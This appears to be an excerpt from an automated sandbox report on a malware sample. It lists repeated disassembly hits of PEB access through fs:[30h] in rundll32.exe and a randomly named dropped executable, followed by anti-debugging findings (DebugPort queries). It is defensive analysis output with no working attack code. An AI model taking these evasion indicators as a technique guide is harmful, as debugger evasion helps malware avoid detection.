Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04382990 mov eax, dword ptr fs:[00000030h] 13_2_04382990
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04408DF1 mov eax, dword ptr fs:[00000030h] 13_2_04408DF1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0437C182 mov eax, dword ptr fs:[00000030h] 13_2_0437C182
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04382581 mov eax, dword ptr fs:[00000030h] 13_2_04382581
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04382581 mov eax, dword ptr fs:[00000030h] 13_2_04382581
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04382581 mov eax, dword ptr fs:[00000030h] 13_2_04382581
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04382581 mov eax, dword ptr fs:[00000030h] 13_2_04382581
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438A185 mov eax, dword ptr fs:[00000030h] 13_2_0438A185
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04352D8A mov eax, dword ptr fs:[00000030h] 13_2_04352D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04352D8A mov eax, dword ptr fs:[00000030h] 13_2_04352D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04352D8A mov eax, dword ptr fs:[00000030h] 13_2_04352D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04352D8A mov eax, dword ptr fs:[00000030h] 13_2_04352D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04352D8A mov eax, dword ptr fs:[00000030h] 13_2_04352D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0435B1E1 mov eax, dword ptr fs:[00000030h] 13_2_0435B1E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0435B1E1 mov eax, dword ptr fs:[00000030h] 13_2_0435B1E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0435B1E1 mov eax, dword ptr fs:[00000030h] 13_2_0435B1E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043E41E8 mov eax, dword ptr fs:[00000030h] 13_2_043E41E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0436D5E0 mov eax, dword ptr fs:[00000030h] 13_2_0436D5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0436D5E0 mov eax, dword ptr fs:[00000030h] 13_2_0436D5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_044205AC mov eax, dword ptr fs:[00000030h] 13_2_044205AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_044205AC mov eax, dword ptr fs:[00000030h] 13_2_044205AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D6DC9 mov eax, dword ptr fs:[00000030h] 13_2_043D6DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D6DC9 mov eax, dword ptr fs:[00000030h] 13_2_043D6DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D6DC9 mov eax, dword ptr fs:[00000030h] 13_2_043D6DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D6DC9 mov ecx, dword ptr fs:[00000030h] 13_2_043D6DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D6DC9 mov eax, dword ptr fs:[00000030h] 13_2_043D6DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D6DC9 mov eax, dword ptr fs:[00000030h] 13_2_043D6DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0435E620 mov eax, dword ptr fs:[00000030h] 13_2_0435E620
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04394A2C mov eax, dword ptr fs:[00000030h] 13_2_04394A2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04394A2C mov eax, dword ptr fs:[00000030h] 13_2_04394A2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0440B260 mov eax, dword ptr fs:[00000030h] 13_2_0440B260
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0440B260 mov eax, dword ptr fs:[00000030h] 13_2_0440B260
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04428A62 mov eax, dword ptr fs:[00000030h] 13_2_04428A62
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0435AA16 mov eax, dword ptr fs:[00000030h] 13_2_0435AA16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0435AA16 mov eax, dword ptr fs:[00000030h] 13_2_0435AA16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438A61C mov eax, dword ptr fs:[00000030h] 13_2_0438A61C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438A61C mov eax, dword ptr fs:[00000030h] 13_2_0438A61C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04355210 mov eax, dword ptr fs:[00000030h] 13_2_04355210
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04355210 mov ecx, dword ptr fs:[00000030h] 13_2_04355210
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04355210 mov eax, dword ptr fs:[00000030h] 13_2_04355210
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04355210 mov eax, dword ptr fs:[00000030h] 13_2_04355210
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04373A1C mov eax, dword ptr fs:[00000030h] 13_2_04373A1C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0435C600 mov eax, dword ptr fs:[00000030h] 13_2_0435C600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0435C600 mov eax, dword ptr fs:[00000030h] 13_2_0435C600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0435C600 mov eax, dword ptr fs:[00000030h] 13_2_0435C600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04388E00 mov eax, dword ptr fs:[00000030h] 13_2_04388E00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04368A0A mov eax, dword ptr fs:[00000030h] 13_2_04368A0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0439927A mov eax, dword ptr fs:[00000030h] 13_2_0439927A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0437AE73 mov eax, dword ptr fs:[00000030h] 13_2_0437AE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0437AE73 mov eax, dword ptr fs:[00000030h] 13_2_0437AE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0437AE73 mov eax, dword ptr fs:[00000030h] 13_2_0437AE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0437AE73 mov eax, dword ptr fs:[00000030h] 13_2_0437AE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0437AE73 mov eax, dword ptr fs:[00000030h] 13_2_0437AE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04411608 mov eax, dword ptr fs:[00000030h] 13_2_04411608
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0436766D mov eax, dword ptr fs:[00000030h] 13_2_0436766D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043E4257 mov eax, dword ptr fs:[00000030h] 13_2_043E4257
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04359240 mov eax, dword ptr fs:[00000030h] 13_2_04359240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04359240 mov eax, dword ptr fs:[00000030h] 13_2_04359240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04359240 mov eax, dword ptr fs:[00000030h] 13_2_04359240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04359240 mov eax, dword ptr fs:[00000030h] 13_2_04359240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04367E41 mov eax, dword ptr fs:[00000030h] 13_2_04367E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04367E41 mov eax, dword ptr fs:[00000030h] 13_2_04367E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04367E41 mov eax, dword ptr fs:[00000030h] 13_2_04367E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04367E41 mov eax, dword ptr fs:[00000030h] 13_2_04367E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04367E41 mov eax, dword ptr fs:[00000030h] 13_2_04367E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04367E41 mov eax, dword ptr fs:[00000030h] 13_2_04367E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0440FE3F mov eax, dword ptr fs:[00000030h] 13_2_0440FE3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0440FEC0 mov eax, dword ptr fs:[00000030h] 13_2_0440FEC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0436AAB0 mov eax, dword ptr fs:[00000030h] 13_2_0436AAB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0436AAB0 mov eax, dword ptr fs:[00000030h] 13_2_0436AAB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438FAB0 mov eax, dword ptr fs:[00000030h] 13_2_0438FAB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043552A5 mov eax, dword ptr fs:[00000030h] 13_2_043552A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043552A5 mov eax, dword ptr fs:[00000030h] 13_2_043552A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043552A5 mov eax, dword ptr fs:[00000030h] 13_2_043552A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043552A5 mov eax, dword ptr fs:[00000030h] 13_2_043552A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043552A5 mov eax, dword ptr fs:[00000030h] 13_2_043552A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04428ED6 mov eax, dword ptr fs:[00000030h] 13_2_04428ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D46A7 mov eax, dword ptr fs:[00000030h] 13_2_043D46A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438D294 mov eax, dword ptr fs:[00000030h] 13_2_0438D294
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438D294 mov eax, dword ptr fs:[00000030h] 13_2_0438D294
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043EFE87 mov eax, dword ptr fs:[00000030h] 13_2_043EFE87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043676E2 mov eax, dword ptr fs:[00000030h] 13_2_043676E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043816E0 mov ecx, dword ptr fs:[00000030h] 13_2_043816E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04382AE4 mov eax, dword ptr fs:[00000030h] 13_2_04382AE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04420EA5 mov eax, dword ptr fs:[00000030h] 13_2_04420EA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04420EA5 mov eax, dword ptr fs:[00000030h] 13_2_04420EA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04420EA5 mov eax, dword ptr fs:[00000030h] 13_2_04420EA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04382ACB mov eax, dword ptr fs:[00000030h] 13_2_04382ACB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043836CC mov eax, dword ptr fs:[00000030h] 13_2_043836CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04398EC7 mov eax, dword ptr fs:[00000030h] 13_2_04398EC7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438E730 mov eax, dword ptr fs:[00000030h] 13_2_0438E730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04428B58 mov eax, dword ptr fs:[00000030h] 13_2_04428B58
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04354F2E mov eax, dword ptr fs:[00000030h] 13_2_04354F2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04354F2E mov eax, dword ptr fs:[00000030h] 13_2_04354F2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0437F716 mov eax, dword ptr fs:[00000030h] 13_2_0437F716
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04428F6A mov eax, dword ptr fs:[00000030h] 13_2_04428F6A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043EFF10 mov eax, dword ptr fs:[00000030h] 13_2_043EFF10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043EFF10 mov eax, dword ptr fs:[00000030h] 13_2_043EFF10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438A70E mov eax, dword ptr fs:[00000030h] 13_2_0438A70E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438A70E mov eax, dword ptr fs:[00000030h] 13_2_0438A70E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04383B7A mov eax, dword ptr fs:[00000030h] 13_2_04383B7A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04383B7A mov eax, dword ptr fs:[00000030h] 13_2_04383B7A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0442070D mov eax, dword ptr fs:[00000030h] 13_2_0442070D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0442070D mov eax, dword ptr fs:[00000030h] 13_2_0442070D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0435DB60 mov ecx, dword ptr fs:[00000030h] 13_2_0435DB60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0436FF60 mov eax, dword ptr fs:[00000030h] 13_2_0436FF60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0441131B mov eax, dword ptr fs:[00000030h] 13_2_0441131B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0435F358 mov eax, dword ptr fs:[00000030h] 13_2_0435F358
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0435DB40 mov eax, dword ptr fs:[00000030h] 13_2_0435DB40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0436EF40 mov eax, dword ptr fs:[00000030h] 13_2_0436EF40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04384BAD mov eax, dword ptr fs:[00000030h] 13_2_04384BAD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04384BAD mov eax, dword ptr fs:[00000030h] 13_2_04384BAD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04384BAD mov eax, dword ptr fs:[00000030h] 13_2_04384BAD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04368794 mov eax, dword ptr fs:[00000030h] 13_2_04368794
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438B390 mov eax, dword ptr fs:[00000030h] 13_2_0438B390
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D7794 mov eax, dword ptr fs:[00000030h] 13_2_043D7794
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D7794 mov eax, dword ptr fs:[00000030h] 13_2_043D7794
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D7794 mov eax, dword ptr fs:[00000030h] 13_2_043D7794
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04382397 mov eax, dword ptr fs:[00000030h] 13_2_04382397
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04361B8F mov eax, dword ptr fs:[00000030h] 13_2_04361B8F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04361B8F mov eax, dword ptr fs:[00000030h] 13_2_04361B8F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0440D380 mov ecx, dword ptr fs:[00000030h] 13_2_0440D380
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0441138A mov eax, dword ptr fs:[00000030h] 13_2_0441138A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043937F5 mov eax, dword ptr fs:[00000030h] 13_2_043937F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043803E2 mov eax, dword ptr fs:[00000030h] 13_2_043803E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043803E2 mov eax, dword ptr fs:[00000030h] 13_2_043803E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043803E2 mov eax, dword ptr fs:[00000030h] 13_2_043803E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043803E2 mov eax, dword ptr fs:[00000030h] 13_2_043803E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043803E2 mov eax, dword ptr fs:[00000030h] 13_2_043803E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043803E2 mov eax, dword ptr fs:[00000030h] 13_2_043803E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0437DBE9 mov eax, dword ptr fs:[00000030h] 13_2_0437DBE9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04425BA5 mov eax, dword ptr fs:[00000030h] 13_2_04425BA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D53CA mov eax, dword ptr fs:[00000030h] 13_2_043D53CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D53CA mov eax, dword ptr fs:[00000030h] 13_2_043D53CA
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01059100 mov eax, dword ptr fs:[00000030h] 23_2_01059100
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01059100 mov eax, dword ptr fs:[00000030h] 23_2_01059100
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01059100 mov eax, dword ptr fs:[00000030h] 23_2_01059100
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01060100 mov eax, dword ptr fs:[00000030h] 23_2_01060100
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01060100 mov eax, dword ptr fs:[00000030h] 23_2_01060100
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01060100 mov eax, dword ptr fs:[00000030h] 23_2_01060100
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01074120 mov eax, dword ptr fs:[00000030h] 23_2_01074120
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01074120 mov eax, dword ptr fs:[00000030h] 23_2_01074120
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01074120 mov eax, dword ptr fs:[00000030h] 23_2_01074120
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01074120 mov eax, dword ptr fs:[00000030h] 23_2_01074120
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01074120 mov ecx, dword ptr fs:[00000030h] 23_2_01074120
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0108513A mov eax, dword ptr fs:[00000030h] 23_2_0108513A
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0108513A mov eax, dword ptr fs:[00000030h] 23_2_0108513A
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01053138 mov ecx, dword ptr fs:[00000030h] 23_2_01053138
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01111951 mov eax, dword ptr fs:[00000030h] 23_2_01111951
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0107B944 mov eax, dword ptr fs:[00000030h] 23_2_0107B944
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0107B944 mov eax, dword ptr fs:[00000030h] 23_2_0107B944
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0105395E mov eax, dword ptr fs:[00000030h] 23_2_0105395E
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0105395E mov eax, dword ptr fs:[00000030h] 23_2_0105395E
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0105C962 mov eax, dword ptr fs:[00000030h] 23_2_0105C962
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0111E962 mov eax, dword ptr fs:[00000030h] 23_2_0111E962
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0105B171 mov eax, dword ptr fs:[00000030h] 23_2_0105B171
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0105B171 mov eax, dword ptr fs:[00000030h] 23_2_0105B171
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01128966 mov eax, dword ptr fs:[00000030h] 23_2_01128966
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0107C182 mov eax, dword ptr fs:[00000030h] 23_2_0107C182
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0108A185 mov eax, dword ptr fs:[00000030h] 23_2_0108A185
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01082990 mov eax, dword ptr fs:[00000030h] 23_2_01082990
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01084190 mov eax, dword ptr fs:[00000030h] 23_2_01084190
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0111A189 mov eax, dword ptr fs:[00000030h] 23_2_0111A189
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0111A189 mov ecx, dword ptr fs:[00000030h] 23_2_0111A189
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0105519E mov eax, dword ptr fs:[00000030h] 23_2_0105519E
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0105519E mov ecx, dword ptr fs:[00000030h] 23_2_0105519E
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010861A0 mov eax, dword ptr fs:[00000030h] 23_2_010861A0
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010861A0 mov eax, dword ptr fs:[00000030h] 23_2_010861A0
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010D69A6 mov eax, dword ptr fs:[00000030h] 23_2_010D69A6
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010D51BE mov eax, dword ptr fs:[00000030h] 23_2_010D51BE
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010D51BE mov eax, dword ptr fs:[00000030h] 23_2_010D51BE
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010D51BE mov eax, dword ptr fs:[00000030h] 23_2_010D51BE
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010D51BE mov eax, dword ptr fs:[00000030h] 23_2_010D51BE
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_011149A4 mov eax, dword ptr fs:[00000030h] 23_2_011149A4
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_011149A4 mov eax, dword ptr fs:[00000030h] 23_2_011149A4
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_011149A4 mov eax, dword ptr fs:[00000030h] 23_2_011149A4
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_011149A4 mov eax, dword ptr fs:[00000030h] 23_2_011149A4
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010799BF mov ecx, dword ptr fs:[00000030h] 23_2_010799BF
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010799BF mov ecx, dword ptr fs:[00000030h] 23_2_010799BF
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010799BF mov eax, dword ptr fs:[00000030h] 23_2_010799BF
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010799BF mov ecx, dword ptr fs:[00000030h] 23_2_010799BF
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010799BF mov ecx, dword ptr fs:[00000030h] 23_2_010799BF
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010799BF mov eax, dword ptr fs:[00000030h] 23_2_010799BF
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010799BF mov ecx, dword ptr fs:[00000030h] 23_2_010799BF
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010799BF mov ecx, dword ptr fs:[00000030h] 23_2_010799BF
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010799BF mov eax, dword ptr fs:[00000030h] 23_2_010799BF
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010799BF mov ecx, dword ptr fs:[00000030h] 23_2_010799BF
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010799BF mov ecx, dword ptr fs:[00000030h] 23_2_010799BF
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010799BF mov eax, dword ptr fs:[00000030h] 23_2_010799BF
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_011119D8 mov eax, dword ptr fs:[00000030h] 23_2_011119D8
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0105B1E1 mov eax, dword ptr fs:[00000030h] 23_2_0105B1E1
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0105B1E1 mov eax, dword ptr fs:[00000030h] 23_2_0105B1E1
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0105B1E1 mov eax, dword ptr fs:[00000030h] 23_2_0105B1E1
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010531E0 mov eax, dword ptr fs:[00000030h] 23_2_010531E0
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010E41E8 mov eax, dword ptr fs:[00000030h] 23_2_010E41E8
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_011289E7 mov eax, dword ptr fs:[00000030h] 23_2_011289E7
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01056800 mov eax, dword ptr fs:[00000030h] 23_2_01056800
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01056800 mov eax, dword ptr fs:[00000030h] 23_2_01056800
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01056800 mov eax, dword ptr fs:[00000030h] 23_2_01056800
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01124015 mov eax, dword ptr fs:[00000030h] 23_2_01124015
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01124015 mov eax, dword ptr fs:[00000030h] 23_2_01124015
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010D7016 mov eax, dword ptr fs:[00000030h] 23_2_010D7016
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010D7016 mov eax, dword ptr fs:[00000030h] 23_2_010D7016
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010D7016 mov eax, dword ptr fs:[00000030h] 23_2_010D7016
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\bin.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
